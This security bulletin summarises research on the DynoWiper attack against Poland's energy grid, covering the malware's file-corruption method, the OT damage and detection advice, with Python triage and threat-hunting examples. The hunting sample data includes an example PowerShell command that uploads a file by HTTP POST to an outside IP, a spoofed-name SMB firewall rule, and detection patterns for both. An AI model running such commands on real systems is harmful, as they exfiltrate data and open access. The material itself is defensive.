Detecting Russian Threats to Critical Energy Infrastructure
Summary:
According to researchers at Truesec, the December 2025 cyberattack on the Polish electrical grid marks a significant shift in Russian cyber warfare, specifically attributed to the threat actor DragonFly. While this group has historically focused on long-term espionage and pre-positioning within Western infrastructure, this event represents their first known transition into destructive operations against a NATO member's energy sector.
The attack utilized sophisticated wiper malware, such as DynoWiper, to target grid connection points and thermal power plants, signaling that Russia has crossed a critical threshold in its willingness to disrupt life-sustaining services outside of Ukraine. Unlike some complex industrial malware, DynoWiper is functionally straightforward but optimized for speed and maximum destruction of the IT environment:
- To speed up the destruction process, the malware does not overwrite entire files. Instead, it uses a Mersenne Twister pseudorandom number generator to overwrite the first 16 bytes (the header) of each file. For larger files, it also generates up to 4,096 random offsets and overwrites each with a 16-byte sequence of random data, rendering the files unrecoverable while avoiding the time-consuming process of a full wipe.
- It recursively scans all logical drives (A-Z), specifically targeting "Fixed" (hard drives) and "Removable" (USB/SD cards) media.
- It deliberately skips critical system folders like C:\Windows, C:\Program Files, and C:\Boot. This is a calculated tactic to keep the operating system running just long enough for the malware to finish wiping user data before the system inevitably crashes.
- Once the wiping cycle is complete, the malware obtains administrative shutdown privileges and forces an immediate system reboot to finalize the disruption.
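As an added illustration (not code from Truesec or from this bulletin), a Python triage routine for the two artifacts the overwrite pattern above leaves on a recovered volume: files whose leading bytes no longer match the magic expected for their extension, and 16-byte runs of random-looking binary scattered through otherwise text-like files. The magic table, the text-like extension set, the non-printable threshold and the demo input are all constructed assumptions.

```python
from pathlib import Path

# Constructed magic-byte table (not exhaustive) and text-like formats; both are assumptions.
MAGIC = {".pdf": b"%PDF-", ".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff",
         ".docx": b"PK\x03\x04", ".xlsx": b"PK\x03\x04", ".zip": b"PK\x03\x04"}
TEXT_LIKE = {".txt", ".csv", ".log", ".xml", ".json", ".ini"}
CHUNK = 16  # DynoWiper overwrites 16-byte sequences
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}

def binary_count(window: bytes) -> int:
    return sum(b not in PRINTABLE for b in window)

def random_islands(data: bytes, min_binary: int = 6) -> list[int]:
    """Start offsets of 16-byte runs of random-looking binary inside text-like data.
    16 random bytes are ~61% non-printable, so >= 6 is a loose assumed threshold;
    genuine UTF-8 non-ASCII text can trip it too, so hits are leads, not proof."""
    hits, i = [], 0
    while i + CHUNK <= len(data):
        window = data[i:i + CHUNK]
        if binary_count(window) >= min_binary:
            start = i + next(k for k, b in enumerate(window) if b not in PRINTABLE)
            hits.append(start)
            i = start + CHUNK  # step past this island before looking again
        else:
            i += 1
    return hits

def triage(data: bytes, suffix: str) -> dict:
    """header_mismatch: the 16-byte header overwrite; islands: the scattered overwrites."""
    suffix = suffix.lower()
    expected = MAGIC.get(suffix)
    header_bad = expected is not None and not data.startswith(expected)
    islands = []
    if suffix in TEXT_LIKE:
        header_bad = header_bad or binary_count(data[:CHUNK]) >= 6
        islands = random_islands(data)
    return {"header_mismatch": header_bad, "islands": islands,
            "suspicious": header_bad or len(islands) >= 2}

def scan_tree(root: str) -> list[tuple[str, dict]]:
    """Walk a recovered volume or share and return the files matching the pattern."""
    return [(str(p), r) for p in Path(root).rglob("*") if p.is_file()
            for r in [triage(p.read_bytes(), p.suffix)] if r["suspicious"]]

# Constructed demo input: a CSV whose header and two scattered 16-byte runs were overwritten.
JUNK = bytes.fromhex("9c02e741b37f00d81a6eff05c28933ee")
def demo_sample() -> bytes:
    body = bytearray(b"timestamp,feeder,kw\n" * 64)
    for off in (0, 200, 700):
        body[off:off + CHUNK] = JUNK
    return bytes(body)
```

Compressed or encrypted formats are already high-entropy, so only the header check applies to them; that is why the island heuristic is restricted to text-like extensions.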
Security Officer Comments:
The potential impact of such attacks is severe, with Polish authorities estimating that the December incident could have left up to 500,000 people without electricity and heating in a worst-case scenario. Beyond the immediate loss of utility services, the technical impact involves the permanent or long-term disabling of Operational Technology (OT) equipment. By overwriting firmware on Remote Terminal Units (RTUs) with corrupted data and using wipers to destroy Human-Machine Interface (HMI) systems, the attackers aim to inhibit system recovery, forcing utilities to physically replace hardware rather than simply rebooting systems.
The 2025-2026 cyberattack on the Polish energy grid serves as a warning for the United States. It demonstrates that Russian state actors (DragonFly/Sandworm) are no longer merely mapping NATO infrastructure for intelligence; they have shifted to active destructive operations designed to cause civilian casualties and civil unrest.
A major takeaway is the shift from targeting centralized power plants to the distributed edge of the grid. The attackers hit over 30 renewable energy farms (wind and solar) by targeting the grid connection points that transfer power to the national system. As the US shifts to a greener grid, smaller, decentralized sites often have weaker security than massive nuclear or coal plants. These sites often fall below federal regulatory thresholds (like NERC CIP), making them soft targets.
There are also concerns about the US’s readiness for non-repairable equipment damage. By overwriting the firmware on Remote Terminal Units (RTUs), the attackers made the devices physically non-functional. These are not reboot-and-restore fixes; they require the physical replacement of hardware. The US must evaluate its supply-chain resilience and spare-parts inventory. If a coordinated attack hit 50 US substations simultaneously, it is unclear whether enough spare RTUs and trained technicians would be available to restore the grid.
Suggested Corrections:
To mitigate these threats, Truesec recommends a shift toward behavior-based detection and proactive threat hunting rather than relying solely on static indicators. Organizations should implement YARA rules designed to identify the specific mathematical constants used by DynoWiper's random-number generators and monitor for suspicious ELF binaries that signal firmware corruption. Additionally, defenders should hunt for preparatory activities, such as the unauthorized enabling of administrative shares (AutoShareWks/Server) and the creation of misleading firewall rules (e.g., naming a rule "Microsoft Update" to allow SMB traffic). Comprehensive monitoring of PowerShell commands, specifically those used for data exfiltration via HTTP POST or for service restarts, is essential for evicting these actors before they reach the destructive phase of their mission.
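As an added example (not Truesec's own detection content), Python hunt logic over constructed process-creation and registry-set events for the preparatory activities listed above: writes to AutoShareWks/AutoShareServer under LanmanServer\Parameters, a new firewall rule allowing port 445 under a vendor-looking name, and PowerShell HTTP POST uploads or service restarts. The JSON-lines event format, field names, rule identifiers and sample events are assumptions; the YARA and ELF checks mentioned above are out of scope here.

```python
import json
import re

# Constructed sample telemetry (process-creation and registry-set events), one JSON object per line.
SAMPLE_EVENTS = r"""
{"host":"hmi-01","type":"process","cmd":"netsh advfirewall firewall add rule name=\"Microsoft Update\" dir=in action=allow protocol=TCP localport=445"}
{"host":"hmi-01","type":"registry","key":"HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters","value":"AutoShareWks","data":"1"}
{"host":"eng-ws-07","type":"process","cmd":"powershell.exe -nop -w hidden Invoke-WebRequest -Uri http://203.0.113.10/u -Method POST -InFile C:\\temp\\cfg.zip"}
{"host":"eng-ws-07","type":"process","cmd":"powershell.exe Restart-Service -Name lanmanserver -Force"}
{"host":"eng-ws-07","type":"process","cmd":"powershell.exe Get-Service -Name spooler"}
{"host":"scada-fs","type":"process","cmd":"netsh advfirewall firewall add rule name=\"Vendor VPN\" dir=in action=allow protocol=UDP localport=1194"}
"""

SHARE_KEY  = re.compile(r"services\\lanmanserver\\parameters$", re.I)
SHARE_VALS = {"autosharewks", "autoshareserver"}
SMB_RULE   = re.compile(r"advfirewall\s+firewall\s+add\s+rule.*(local|remote)port=445\b", re.I)
RULE_NAME  = re.compile(r'name="([^"]*)"', re.I)
SPOOF_NAME = re.compile(r"microsoft|windows|update", re.I)  # vendor-looking rule names
PS_POST    = re.compile(r"Invoke-(WebRequest|RestMethod)[^|;]*-Method\s+POST|\.Upload(File|String|Data)\(", re.I)
PS_SVC     = re.compile(r"\b(Restart|Stop|Start)-Service\b", re.I)

def check_event(ev: dict) -> list[tuple[str, str]]:
    """Return (rule_id, evidence) pairs for one event; empty list if nothing matched."""
    hits = []
    if ev["type"] == "registry":
        # Any write to AutoShareWks/AutoShareServer under LanmanServer is worth a look,
        # whether it enables (1) or disables (0) the admin shares.
        if SHARE_KEY.search(ev["key"]) and ev["value"].lower() in SHARE_VALS:
            hits.append(("admin_share_change", f'{ev["value"]}={ev["data"]}'))
    elif ev["type"] == "process":
        cmd = ev["cmd"]
        if SMB_RULE.search(cmd):
            m = RULE_NAME.search(cmd)
            name = m.group(1) if m else "(unnamed)"
            rule = "smb_allow_rule_spoofed_name" if SPOOF_NAME.search(name) else "smb_allow_rule"
            hits.append((rule, name))
        if "powershell" in cmd.lower():
            if PS_POST.search(cmd):
                hits.append(("ps_http_post", cmd[:80]))
            if PS_SVC.search(cmd):
                hits.append(("ps_service_restart", cmd[:80]))
    return hits

def hunt(jsonl: str) -> list[dict]:
    """Run every rule over a JSON-lines export and return one finding per match."""
    findings = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        findings.extend({"host": ev["host"], "rule": r, "evidence": e} for r, e in check_event(ev))
    return findings
```

Grouping findings by host, as the sample does for hmi-01 and eng-ws-07, is what turns individual low-severity matches into a pre-positioning lead worth escalating.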
Link(s):
https://www.truesec.com/hub/blog/detecting-russian-threats-to-critical-energy-infrastructure